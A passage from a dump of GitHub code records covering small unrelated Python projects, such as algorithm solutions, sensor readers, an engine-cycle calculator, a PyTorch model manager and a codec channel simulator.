return {\n \"image\": {\n \"width\": im.width,\n \"height\": im.height,\n \"format\": im.format,\n \"megapixels\": (im.width * im.height) / 1000000,\n \"shape\": [\n im.height,\n im.width,\n len(im.getbands())\n ]\n }\n }\n\n def implementors(self):\n return ['Jonathon Gaff']\n\n def version(self):\n return '0.0.2'\n","repo_name":"materials-data-facility/scythe","sub_path":"scythe/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"94"} +{"seq_id":"70395876789","text":"import sys\n\nN = int(input())\nM = int(input())\narr = []\nnum = 1\nfor line in sys.stdin:\n a, b = map(int, line.strip().split())\n # 모든 노선을 한쪽 방향으로 통일\n if a > b:\n b += N\n # 도착지점을 먼 순서로 정렬하기 위해 음수로 삽입\n arr.append((a, -b, num))\n num += 1\n\n\ntmp = []\nbea = beb = -1\nfor a, b, n in sorted(arr):\n b = -b\n # 시작지점이 동일한 경우는 도착지점이 가장 먼 노드만 남겨놓음\n # 이전 노선에서의 가장 먼 도착지점보다 현재 노선의 가장 먼 도착지점이 가까울 경우 해당 노선 모두 제외\n if a == bea or b <= beb:\n continue\n bea, beb = a, b\n tmp.append((a, b, n))\n\n# 마지막 노선이 덮을 수 있는 노선들을 확인\nanswer = []\nfor a, b, n in tmp:\n if b + N > beb:\n answer.append(n)\nprint(' '.join(map(str, sorted(answer))))","repo_name":"bconfiden2/daily-ps","sub_path":"boj/2022/08.August/10165.py","file_name":"10165.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41472714372","text":"import PhotoCtrl\nimport detect\nimport logging\nimport PiConf\n\nclass HaarDetectCtrl:\n\n cascade = PiConf.CAT_CASCADE\n\n def structure(self,rects):\n if rects is None:\n return []\n ret = []\n for r in rects:\n if len(r) < 4:\n continue\n R = {\"x\" : r[0], \"y\" : r[1], \"w\" : r[2], \"h\" : r[3]}\n ret.append(R)\n logging.debug(ret)\n return ret\n\n def detect_file(self, path):\n pic, rects = detect.handleFile(path, self.cascade)\n logging.debug(\"Detected on\" + path + \": \" + str(rects))\n return self.structure(rects)\n\n\n\n def do_detect(self, img):\n path = PiConf.PHOTO_PATH + \"/\" + img + \".jpg\"\n return self.detect_file(path)\n \n\n\n\ndef createDetectCtrl():\n return HaarDetectCtrl()\n\n\nif __name__ == '__main__':\n D = createDetectCtrl()\n p = \"test/data/cat.jpg\"\n rc = D.detect_file(p)\n print (rc)","repo_name":"tprlab/pitanq","sub_path":"HaarDetectCtrl.py","file_name":"HaarDetectCtrl.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"94"} +{"seq_id":"7436456420","text":"import argparse\r\nimport datetime\r\nimport json\r\nimport logging\r\nimport uuid\r\nimport serial\r\n\r\nfrom os.path import normpath, join\r\n\r\nlogging.basicConfig(format='%(asctime)-15s %(message)s')\r\nlogger = logging.getLogger('serial-reader')\r\nlogger.setLevel(level=logging.INFO)\r\nlogger.info('serial-reader started')\r\n\r\nparser = argparse.ArgumentParser(description='Device Data Serial Reader.')\r\nparser.add_argument('--serial', nargs=1, type=str, required=True, help='serial port address')\r\nparser.add_argument('--dir', nargs=1, type=str, required=True, help='directory to save messages')\r\nargs = parser.parse_args()\r\nsport = args.serial[0]\r\nmdir = args.dir[0]\r\n\r\nlogger.info('Reading from ' + sport)\r\nser = serial.Serial(sport, 9600)\r\nwhile True:\r\n data = ser.readline()\r\n logger.debug(data)\r\n logger.info('{0} bytes read'.format(len(data)))\r\n msg = int(data)\r\n logger.debug(msg)\r\n deviceId = msg >> 28 & 0xF\r\n logger.debug('deviceId: ' + str(deviceId))\r\n curtime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n fname = str(uuid.uuid1())\r\n jm = ''\r\n if deviceId == 0:\r\n jm = json.dumps({\r\n 'deviceId': deviceId,\r\n 'distance': (msg >> 16) & 0xFFF,\r\n 'timestamp': curtime},\r\n sort_keys=True,\r\n indent=4)\r\n logger.debug(jm)\r\n elif deviceId == 1:\r\n jm = json.dumps({\r\n 'deviceId': deviceId,\r\n 'humidity': (msg >> 21) & 0x7F,\r\n 'temperature': (msg >> 15) & 0x3F,\r\n 'rain': (msg >> 13) & 0x3,\r\n 'timestamp': curtime},\r\n sort_keys=True,\r\n indent=4)\r\n logger.debug(jm)\r\n elif deviceId == 2:\r\n jm = json.dumps({\r\n 'deviceId': deviceId,\r\n 'humidity': (msg >> 16) & 0xFFF,\r\n 'temperature': msg & 0xFFFF,\r\n 'timestamp': curtime},\r\n sort_keys=True,\r\n indent=4)\r\n logger.debug(jm)\r\n elif deviceId == 3:\r\n jm = json.dumps({\r\n 'deviceId': deviceId,\r\n 'pressure': (msg >> 12) & 0x3FF,\r\n 'temperature': (msg >> 22) & 0x3F,\r\n 'timestamp': curtime},\r\n sort_keys=True,\r\n indent=4)\r\n logger.debug(jm)\r\n else:\r\n logger.error('Unsupported deviceId ' + str(deviceId) + ', message: ' + str(data))\r\n continue\r\n f = open(normpath(join(mdir, fname)), \"w\")\r\n f.write(jm)\r\n f.close()\r\n logger.info('Saved sensor data to file {0}'.format(fname))","repo_name":"subzero0x1/Sensors","sub_path":"data-server/serial-reader.py","file_name":"serial-reader.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"30782213221","text":"#\n# @lc app=leetcode id=317 lang=python3\n#\n# [317] Shortest Distance from All Buildings\n#\n# https://leetcode.com/problems/shortest-distance-from-all-buildings/description/\n#\n# algorithms\n# Hard (40.84%)\n# Likes: 732\n# Dislikes: 42\n# Total Accepted: 63.9K\n# Total Submissions: 156.4K\n# Testcase Example: '[[1,0,2,0,1],[0,0,0,0,0],[0,0,1,0,0]]'\n#\n# You want to build a house on an empty land which reaches all buildings in the\n# shortest amount of distance. You can only move up, down, left and right. You\n# are given a 2D grid of values 0, 1 or 2, where:\n# \n# \n# Each 0 marks an empty land which you can pass by freely.\n# Each 1 marks a building which you cannot pass through.\n# Each 2 marks an obstacle which you cannot pass through.\n# \n# \n# Example:\n# \n# \n# Input: [[1,0,2,0,1],[0,0,0,0,0],[0,0,1,0,0]]\n# \n# 1 - 0 - 2 - 0 - 1\n# | | | | |\n# 0 - 0 - 0 - 0 - 0\n# | | | | |\n# 0 - 0 - 1 - 0 - 0\n# \n# Output: 7 \n# \n# Explanation: Given three buildings at (0,0), (0,4), (2,2), and an obstacle at\n# (0,2),\n# ⁠ the point (1,2) is an ideal empty land to build a house, as the\n# total \n# travel distance of 3+3+1=7 is minimal. So return 7.\n# \n# Note:\n# There will be at least one building. If it is not possible to build such\n# house according to the above rules, return -1.\n# \n#\n\n# @lc code=start\ndef bfs(next_pos, grid):\n visited = set()\n houses_reached = 0\n while next_pos:\n r, c, steps = next_pos.popleft()\n curr_steps, paths = grid[r][c]\n if paths <= -1:\n if paths == -1:\n houses_reached += 1\n continue\n elif (r, c) in visited:\n continue\n visited.add((r, c))\n grid[r][c] = (curr_steps + steps, paths + 1)\n steps += 1\n next_pos.append((r-1, c, steps))\n next_pos.append((r, c-1, steps))\n next_pos.append((r+1, c, steps))\n next_pos.append((r, c+1, steps))\n return houses_reached\n \n\nclass Solution:\n def shortestDistance(self, grid_og: 'List[List[int]]') -> 'int':\n n = len(grid_og)\n m = len(grid_og[0])\n houses = []\n max_val = n*m*n*m + 1\n grid = [[(max_val, -2) for i in range(m + 2)]]\n for r in range(n):\n row = []\n row.append((max_val, -2))\n for c in range(m):\n pos_val = (max_val, -2)\n if grid_og[r][c] == 1:\n houses.append((r+1, c+1)) \n pos_val = (max_val, -1)\n elif grid_og[r][c] == 0:\n pos_val = (0, 0)\n row.append(pos_val)\n row.append((max_val, -2))\n grid.append(row)\n grid.append([(max_val, -2) for i in range(m + 2)])\n houses_num = len(houses)\n for house in houses:\n initial_queue = collections.deque([\n (house[0]-1, house[1], 1),\n (house[0], house[1]-1, 1),\n (house[0]+1, house[1], 1),\n (house[0], house[1]+1, 1),\n ])\n if houses_num > bfs(initial_queue, grid):\n return -1\n min_dist = max_val\n for r in range(1, n+1):\n for c in range(1, m+1):\n steps, paths = grid[r][c]\n if paths == houses_num:\n min_dist = min(min_dist, steps)\n return min_dist\n# @lc code=end\n","repo_name":"Diego-Zulu/leetcode_answers","sub_path":"python3/317.shortest-distance-from-all-buildings.209750093.ac.py","file_name":"317.shortest-distance-from-all-buildings.209750093.ac.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24507844758","text":"\n\ndef get_rating_stars_class(rating):\n if not rating:\n return u\"s00\"\n parts = list(divmod(rating, 1))\n parts[0] = int(parts[0])\n if parts[1] < 0.2:\n parts[1] = 0\n elif parts[1] > 0.8:\n parts[0] += 1\n parts[1] = 0\n else:\n parts[1] = 5\n return \"s%i%i\" % tuple(parts)","repo_name":"colinbdclark/OER-Commons","sub_path":"apps/rating/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"18955722423","text":"\"\"\"\nModel Manager Class which helps setting up the model for training\n\"\"\"\nimport torch\nfrom torch import nn\nfrom utils.utils import init_environment\nfrom network.resnet51 import resnet51\nfrom network.arcface import ArcFace\nfrom collections import OrderedDict\n\n\n\nclass ModelManager():\n \"\"\"\n Model Manager Class\n \"\"\"\n\n def __init__(self, config):\n \"\"\"\n Init Model Manager\n :param config: DotMap Configuration\n \"\"\"\n self.config = config\n self._check_config_parameters()\n\n self.device = init_environment(config)\n\n # if resume training model, load checkpoint\n if self.config.training.resume:\n self.old_checkpoint, self.state_dict = self._get_checkpoint()\n\n # choose to compute parallel or not\n if self.config.training.parallel:\n # Get model for training on multiple GPUs\n self.model = nn.DataParallel(self._create_model().to(self.device), \n device_ids=[int(x[-1]) for x in self.config.basic.cuda_device_name.split(',')])\n else:\n self.model = self._create_model().to(self.device)\n\n\n def _check_config_parameters(self):\n if not isinstance(self.config.training.optimizer.learning_rate, float):\n raise ValueError\n elif not isinstance(self.config.training.optimizer.weight_decay, float):\n raise ValueError\n elif not isinstance(self.config.preprocessing.dataloader.batch_size, int):\n raise ValueError\n elif not isinstance(self.config.training.epochs, int):\n raise ValueError\n elif not isinstance(self.config.training.early_stop, int):\n raise ValueError\n\n\n def _get_checkpoint(self):\n \"\"\"\n get the best_checkpoint of the last training, use for resume and continue the training.\n \"\"\"\n PATH = \"{}/{}/{}\".format(self.config.basic.result_dir, self.config.basic.checkpoint, \"best_checkpoint.pth\" )\n old_checkpoint = torch.load(PATH)\n\n # if the model was trained by nn.DataParallel, need to remove \"module.\" from the keys\n new_state_dict = OrderedDict()\n for i, key in enumerate(old_checkpoint['state_dict']):\n name = key.replace(\"module.\", \"\")\n new_state_dict[name] = old_checkpoint['state_dict'][key]\n\n return old_checkpoint, new_state_dict\n \n\n\n\n def _create_model(self):\n\n if self.config.model.name == \"resnet51\":\n model = resnet51(pretrained=self.config.model.pretrained, progress=False, feature_size=self.config.model.feature_size,\n num_classes=self.config.model.num_classes)\n\n elif self.config.model.name == \"arcface\":\n model = ArcFace(pretrained=self.config.model.pretrained, feature_size=self.config.model.feature_size,\n num_classes=self.config.model.num_classes)\n else:\n raise ValueError\n \n if self.config.training.resume:\n # get the best model from the checkpoint of a previous training\n model.load_state_dict(self.state_dict)\n\n return model\n\n\n","repo_name":"NeutrinoWY/improve_face_recognition_with_image_perturbations","sub_path":"model_training/training/model_manager.py","file_name":"model_manager.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"30007619647","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\nn = int(input())\nnums1 = list(map(int, input().split(' ')))\nhead1 = None\nfor i in range(n):\n if not head1:\n head1 = Node(nums1[i])\n cursor1 = head1\n else:\n cursor1.next = Node(nums1[i])\n cursor1 = cursor1.next\nm = int(input())\nnums2 = list(map(int, input().split(' ')))\nhead2 = None\nfor i in range(m):\n if not head2:\n head2 = Node(nums2[i])\n cursor2 = head2\n else:\n cursor2.next = Node(nums2[i])\n cursor2 = cursor2.next\n\ncursor1 = head1\ncursor2 = head2\nres = []\nwhile cursor1 and cursor2:\n if cursor1.val == cursor2.val:\n res.append(cursor1.val)\n cursor1 = cursor1.next\n cursor2 = cursor2.next\n elif cursor1.val>cursor2.val:\n cursor1 = cursor1.next\n else:\n cursor2 = cursor2.next\nfor i in range(len(res)):\n print(res[i], end=' ')\n\n\n \n\n ","repo_name":"yanglinkevin/pythonAutumnExam","sub_path":"pyCode/tencent1.py","file_name":"tencent1.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73781994548","text":"from telisar.languages.base import BaseLanguage\nimport re\n\n\nclass Celestial(BaseLanguage):\n\n vowels = ['a', 'e', 'i', 'o', 'u', 'î', 'ê', 'â', 'û', 'ô', 'ä', 'ö', 'ü', 'äu', 'ȧ', 'ė', 'ị', 'ȯ', 'u̇']\n\n consonants = ['b', 'sc', 'f', 'h', 'l', 'm', 'n', 'r', 's', 'v']\n\n syllable_template = ('V', 'v', 'c', 'c', 'v', 'v')\n\n _invalid_sequences = re.compile(\n r'[' + ''.join(vowels) + ']{5}|' +\n r'[' + ''.join(consonants) + ']{3}'\n )\n\n syllable_weights = [3, 2]\n\n minimum_length = 5\n\n def validate_sequence(self, sequence, total_syllables):\n too_short = len(''.join(sequence)) < self.minimum_length\n if too_short:\n return False\n\n t = ''.join(sequence)\n\n if self._invalid_sequences.match(t):\n self._logger.debug(f\"Invalid sequence: {t}\")\n return False\n return True\n","repo_name":"evilchili/telisar","sub_path":"telisar/languages/celestial.py","file_name":"celestial.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"32483460677","text":"import random\n\nimport numpy as np\n\n# from keras.layers import Dense, Dropout\n# from keras.models import Sequential\n\n\ndef random_gen(size, max_value):\n gen = []\n for _ in range(size):\n rand_gen = round(random.uniform(0, max_value - 1))\n try:\n gen.index(rand_gen)\n except ValueError:\n gen.append(rand_gen)\n\n return gen\n\n\ndef merge_liner(size, weights_1, weights_2, mutation):\n replace = round(size / 2)\n gen = random_gen(replace, size)\n result = np.zeros(size, dtype='float32')\n\n for itr in gen:\n result[itr] = weights_1[itr]\n\n for itr, _ in np.ndenumerate(weights_2):\n itr = itr[0]\n if itr not in gen:\n result[itr] = weights_2[itr]\n\n if mutation:\n replace = round(size * 0.2)\n gen = random_gen(replace, size)\n for itr in gen:\n result[itr] = random.uniform(-1, 1)\n\n return result\n\n\ndef merge(weights_1, weights_2, mutation=True):\n '''\n merge xx algorithm\n Merge half\n Mutation default 20%\n\n # param\n weights_1 = [[ [weight], [weight], [weight] ], [offsets]]\n '''\n if len(weights_1[0]) != len(weights_2[0]):\n raise Exception()\n\n if len(weights_1[0][0]) != len(weights_2[0][0]):\n raise Exception()\n\n if len(weights_1[1]) != len(weights_2[1]):\n raise Exception()\n\n depth_weights = len(weights_1[0])\n size_weights = len(weights_1[0][0])\n\n result = [np.zeros((depth_weights, size_weights), dtype='float32'), np.zeros(\n size_weights, dtype='float32')]\n\n for depth in range(depth_weights):\n result[0][depth] = merge_liner(\n size_weights, weights_1[0][depth], weights_2[0][depth], mutation)\n\n return result\n\n# model = Sequential()\n\n# input = Dense(18, input_shape=(6,), activation=\"relu\")\n# hidden_1 = Dense(32, activation=\"softmax\")\n# hidden_2 = Dense(32, activation=\"softmax\")\n# output = Dense(4, activation=\"linear\")\n\n# model.add(input)\n# model.add(hidden_1)\n# model.add(Dropout(0.35))\n# model.add(hidden_2)\n# model.add(Dropout(0.35))\n# model.add(output)\n\n# print(input.get_weights())\n\n\nW__1 = [np.random.randn(6, 18), np.zeros(18)]\nW__2 = [np.random.randn(6, 18), np.zeros(18)]\n\nWW = merge(W__1, W__2)\nprint(WW)\n\n# w1 = np.asarray([], dtype='float32')\n","repo_name":"farwydi/dex-nn","sub_path":"python/experiment/move/marge_test.py","file_name":"marge_test.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29377430577","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom winGasProp import GasProp\nfrom stages import *\n\n\nif __name__ == '__main__':\n\n # Stage a\n Ta = 288.16 # K\n pa = 101325 # Pa\n ha, sa = stagea(Ta, pa)\n\n # Stage 0a\n T0a = Ta\n p0a = pa\n h0a, s0a = ha, sa\n\n\n # Stage 01\n specs = pd.read_csv('BasicSpecs.csv')\n eff_diffuser = specs['eff_diffuser'][0]\n T01 = T0a # K\n p01 = p0a*eff_diffuser # Pa\n h01, s01 = stage01(T01, p01)\n\n # Stage 02i\n pi_0c = specs['Compressor Ratio'].values[0]\n h02i, w_ci, p02i, s02i = stage02i(pi_0c, p01, s01, h01)\n\n # Stage 02\n eff_c = specs['eff_compressor'].values[0]\n s02, w_c, h02, p02 = stage02(p02i, w_ci, h01, eff_c)\n print('Compressor Work:', w_c)\n\n # Stage 03\n comb_pLoss = specs['pres_drop_combustor'].values[0]\n eff_comb = 1\n TIT = specs['TIT [K]'].values[0]\n p03 = p02i * (1- comb_pLoss)\n h03, s03, excess_air, r, q = stage03(TIT, h02, eff_comb, p03)\n\n # Stage 04i\n s04i = s03\n eff_turbine = specs['eff_turbine'].values[0]\n h04i, w_t, T04i, p04i = stage04i(h03, w_c, excess_air, eff_turbine, r, q, s04i)\n\n\n # Stage 04\n p04 = p04i\n s04, T04, h04 = stage04(p04, w_t, h03, r, q)\n print('T_04:', T04)\n\n # Stage 04.5i\n s045i = s04\n SHP = specs['Shaft horse power [kW]'].values[0]\n eff_free_turbine = specs['eff_free_turbine'].values[0]\n m_air = 1.64089 #1.365303689 # kg/s\n w_PT, T045i, h045i, p045i, m_g, m_fuel = stage045i(SHP, m_air, excess_air, eff_free_turbine, h04, r, q, s045i)\n\n # Stage 045\n p045 = p045i\n h045, s045, T045 = stage045(p045, w_PT, h04, r, q)\n\n # Stage 5i\n s5i = s045\n p5i = p01/1e5\n # p5i = 1.128 # calculated the critical pressure\n eff_nozzle = specs['eff_nozzle'].values[0]\n eff_propeller = specs['eff_propeller'].values[0]\n T5i, h5i, c5, Spec_Thrust, EBSFC = stage5i(r, q, s5i, p5i, h045, eff_nozzle, m_air,\n excess_air, eff_propeller, SHP, m_fuel)\n\n # Stage 5\n p5 = p5i\n h5 = h5i\n s5 = s5i\n T5 = T5i\n\n\n # Make a Table of the results for each stage\n stages = ['a', '0a', '01', '02i', '02', '03', '04i', '04', '045i', '045', '5i', '5']\n p = [pa/1e5, p0a/1e5, p01/1e5, p02i, p02, p03, p04i, p04, p045i, p045, p5i, p5]\n h = [ha, h0a, h01, h02i, h02, h03, h04i, h04, h045i, h045, h5i, h5]\n s = [sa, s0a, s01, s02i, s02, s03, s04i, s04, s045i, s045, s5i, s5]\n\n print('m_air = ', m_air, 'kg/s')\n print('m_fuel = ', m_fuel, 'kg/s')\n print('TIT = ', TIT, 'K')\n\n df = pd.DataFrame({'Stage': stages, 'Pressure [bar]': p, 'Enthalpy [kJ/kg]': h, 'Entropy [kJ/kg-K]': s})\n print(df)\n\n# df to csv\n df.to_csv('results.csv')\n\n df2 = pd.DataFrame({'w_c': w_c, 'w_t': w_t, 'w_PT': w_PT, 'SHP': SHP, 'm_air': m_air, 'm_fuel': m_fuel, 'Spec_Thrust': Spec_Thrust, 'EBSFC': EBSFC, 'TIT': TIT, 'lambda': excess_air}, index=[0])\n df2.to_csv('results2.csv')\n \n\n\n\n\n\n\n\n","repo_name":"Carmeisel101/RealEngineCycle_TurboProp","sub_path":"task1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"26469365722","text":"import sqlite3\r\n\r\nconn = sqlite3.connect('practise.db')\r\n\r\n# Create a cursor\r\nc = conn.cursor()\r\n\r\n# Create a table\r\nc.execute(\"\"\"\r\n \tcreate table employees ( \r\n\tfirstName text,\r\n\tlastName text,\r\n\temail text,\r\n\tsalary integer\r\n\t)\r\n\t\"\"\")\r\nemployee_detail = [ ('Test1', 'Tes', 'test1@gmail.com', 7000),\r\n\t\t\t\t\t('Test2', 'Tes2', 'test2@gmail.com', 15000),\r\n\t\t\t\t\t('Test3', 'Tes3', 'test3@gmail.com', 25000),\r\n ]\r\nc.executemany(\"insert into employees values (?, ?, ?, ?)\", employee_detail)\r\n\r\nc.execute(\"\"\"\r\n\tselect * from employees\r\n\t\"\"\")\r\n# print(c.fetchone())\r\n# print(c.fetchmany(3))\r\n# print(c.fetchall())\r\nfor row in c.fetchall():\r\n\tprint(row)\r\n\r\nconn.commit()\r\n\r\n# close the connection\r\n\r\nconn.close()\r\n","repo_name":"shriram-s6/My-Learnings-and-Project-Work","sub_path":"Sqlite/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71517747189","text":"import dash\r\nimport dash_html_components as html\r\n\r\napp = dash.Dash()\r\n\r\napp.layout= html.Div(['parent Division',\r\n html.Div(['This is inner division'],style={'color':'brown','backgroundColor':'black'}),\r\n html.Div(['Another inner division'],style={'backgroundColor':'red','color':'white','border':'3px black solide'})],\r\nstyle={'color':'green','textAlign':'center','border':'2px red solid'})\r\n\r\n# if __name__=='__main__':\r\n# app.run_server(debug=True)\r\n","repo_name":"hassandosso/Ploty-Dashboard-Course","sub_path":"Interactive Python Dashboard with plotly dash/data-basic/Dash-basic-layout/html_component.py","file_name":"html_component.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70721564469","text":"import os\nimport disspcap\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\npackets = []\n\n\ndef setup_module():\n pcap = disspcap.Pcap(f'{dir_path}/pcaps/fault_data.pcap')\n packet = pcap.next_packet()\n\n while packet:\n packets.append(packet)\n packet = pcap.next_packet()\n\n\ndef test_binary_data_starting_with_GET():\n assert packets[0].http.request_method == ''\n","repo_name":"danieluhricek/disspcap","sub_path":"tests/test_fault_binary.py","file_name":"test_fault_binary.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"94"} +{"seq_id":"42738106565","text":"\nimport pyfirmata\nfrom time import sleep\nfrom pyfirmata.util import Iterator\nboard= pyfirmata.Arduino('COM3')\n\n\nldr=board.get_pin('a:0:i')\nled=board.get_pin('d:11:p')\n\nwhile True:\n value=ldr.read()\n print(value)\n led.write(value)\n sleep(1)\n\n\n","repo_name":"Kashfi-uddin/Arduino-python","sub_path":"ldr/ldr.py","file_name":"ldr.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"885924355","text":"from lxml import etree\nimport logging\nimport click\nimport jinja2\nfrom pathlib import Path\nimport subprocess\nimport shutil\n\n#------------------------------------------------------------------------------\n\n\n@click.group()\ndef cli():\n pass\n\n#------------------------------------------------------------------------------\n\ndoxy_template = jinja2.Template(\"\"\"\n\nGENERATE_LATEX = NO\nGENERATE_HTML = NO\nGENERATE_XML = YES\nOUTPUT_DIRECTORY = {{output_dir}}\nINPUT= \\\\\n{% for f in files -%}\n {{f}} \\\\\n{% endfor %}\n\"\"\")\n\nc_template = jinja2.Template(\"\"\"\n#include \n#include \"unittest.h\"\n\n/* test functions declarations */\n{% for i in functions -%}\nchar* {{i}}(void);\n{% endfor %}\n\nint test_run = 0;\n\n/* execute all tests */\nstatic char * all_tests() {\n char* msg;\n{% for i in functions %}\n printf(\"starting test {{i}}\\\\n\");\n test_run++;\n msg = {{i}}();\n if(msg) {\n printf(\"finished test {{i}} FAILED\\\\n\");\n return msg;\n }\n else{\n printf(\"finished test {{i}} SUCCEDED\\\\n\");\n }\n{% endfor %}\n return 0;\n}\n\n/* main */\nint main(int argc, char **argv) {\n char *result = all_tests();\n if (result != 0) {\n printf(\"%s\\\\n\", result);\n }\n else {\n printf(\"ALL TESTS PASSED\\\\n\");\n }\n return result != 0;\n printf(\"Tests run: %d\\\\n\", test_run);\n}\n\"\"\")\n\n#------------------------------------------------------------------------------\n\n\n@cli.command()\n@click.option('--output-file', '-o', required=True)\n@click.option('--doxygen-dir', type=Path, required=True)\n@click.argument('files', nargs=-1)\ndef generate(output_file, doxygen_dir, files):\n logging.info(\"files: %s, output_file: %s\", files, output_file)\n run_doxygen(doxygen_dir, files)\n functions = get_functions(doxygen_dir / 'xml' / 'index.xml')\n logging.info(\"Functions: %s\", functions)\n with open(output_file, 'w') as f:\n f.write(c_template.render(functions=functions))\n\n#------------------------------------------------------------------------------\n\n\ndef run_doxygen(doxygen_dir, input_files):\n doxyfile = doxygen_dir / 'doxyfile'\n doxygen_dir.mkdir(exist_ok=True)\n create_doxyfile(doxyfile, doxygen_dir, input_files)\n try:\n shutil.rmtree(str(doxygen_dir / \"xml\"))\n except FileNotFoundError:\n pass\n print(\"*\" * 90)\n print(['doxygen', str(doxyfile)])\n print(\"*\" * 90)\n subprocess.check_call(['doxygen', str(doxyfile)])\n\n#------------------------------------------------------------------------------\n\n\ndef create_doxyfile(doxyfile, doxygen_dir, input_files):\n with doxyfile.open('w') as f:\n f.write(doxy_template.render(files=input_files,\n output_dir=doxygen_dir))\n\n#------------------------------------------------------------------------------\n\n\ndef get_functions(xml):\n with xml.open() as f:\n root = etree.parse(f)\n return [i.find('name').text for i in root.iterfind('.//member')\n if i.get('kind') == 'function'\n if i.find('name').text.startswith(\"test\")]\n\n\n#------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n cli()\n","repo_name":"mariku/ringen","sub_path":"create_test_runner.py","file_name":"create_test_runner.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18427064788","text":"import re\r\n\r\ndoc = open(\"C:\\\\Users\\\\bbarker\\\\Desktop\\\\prices.txt\", \"r\").read()\r\ndocArray = doc.split('},')\r\ncurrCountries = {\"USD\":'\"',\"GBP\":'\"',\"EUR\":'\"'}\r\n\r\nfor i in range(len(docArray)):\r\n country = re.search(r'(?<=\"CountryCode\": \")\\w+', docArray[i])\r\n currency = re.search(r'(?<=\"Currency\": \")\\w+', docArray[i])\r\n current = currCountries[str(currency[0])]\r\n if str(country[0]) not in current:\r\n currCountries[currency[0]] += country[0] + ' '\r\n\r\nfor kind in currCountries:\r\n currCountries[kind] = currCountries[kind].strip().replace(\" \", '\", \"') + '\"'\r\n print(kind + ': ' + currCountries[kind])\r\n","repo_name":"nulleleven/stuff","sub_path":"Countries(currencies).py","file_name":"Countries(currencies).py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39509988076","text":"#loops\nfruits = [\"apple\", \"peach\", \"pear\"]\n\nfor fruit in fruits:\n print(fruit)\n\n#exercise\nstudents_height = [180, 124, 165, 173, 189, 169, 146]\ntotal_height = 0\n\nfor height in students_height:\n total_height += height\n\naverage_height = round(total_height / len(students_height))\nprint(average_height)\n\n#exercise\nscores = input(\"Enter students scores: \").split(\",\")\nhighest = 0\n\n\nfor score in scores:\n if int(score) > highest:\n highest = int(score)\n\nprint(f\"the highest score is {highest}\")\n\n#range function\nfor i in range(1, 11, 2):\n print(i)\n\nsum = 0\nfor number in range(1, 101):\n sum += number\n\nprint(sum)\n\n#exercise\ntotal = 0\nfor i in range(2, 101, 2):\n total += i\n print(total)\n\n#exercise\nfor i in range(1, 101):\n if (i % 3 == 0) and (i % 5 == 0):\n print(\"fizzbuzz\")\n elif i % 3 == 0:\n print(\"fiz\")\n elif i % 5 == 0:\n print(\"buzz\")\n else:\n print(i)\n\n\n\n\n\n\n\n\n","repo_name":"dkerobean/100-Days-Of-Coding-Python","sub_path":"Day 5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8298528709","text":"import os\nimport numpy as np\n\ndef channel(signal, codec, Fs, rate = 0):\n\n\tsignal = np.append(signal, np.zeros(160))\n\tsignal.astype('int16').tofile(\"temp/signal_sent.raw\")\n\n\tif codec == \"AMR\" and Fs == 8000:\n\t\tos.system(\"codecs/encoder_2018 MR122 temp/signal_sent.raw temp/AMR-enc.out\")\n\t\tos.system(\"codecs/decoder_2018 temp/AMR-enc.out temp/signal_received.raw\")\n\t\tsignal_rec = np.fromfile(\"temp/signal_received.raw\", dtype = 'int16')\n\t\tsignal_rec = signal_rec[40:]\n\telif codec == \"SPEEX\" and Fs == 8000:\n\t\tos.system(\"speexenc --bitrate \" + str(rate) + \" temp/signal_sent.raw temp/SPEEX-enc.out\")\n\t\tos.system(\"speexdec temp/SPEEX-enc.out temp/signal_received.raw\")\n\t\tsignal_rec = np.fromfile(\"temp/signal_received.raw\", dtype = 'int16')\n\telif codec == 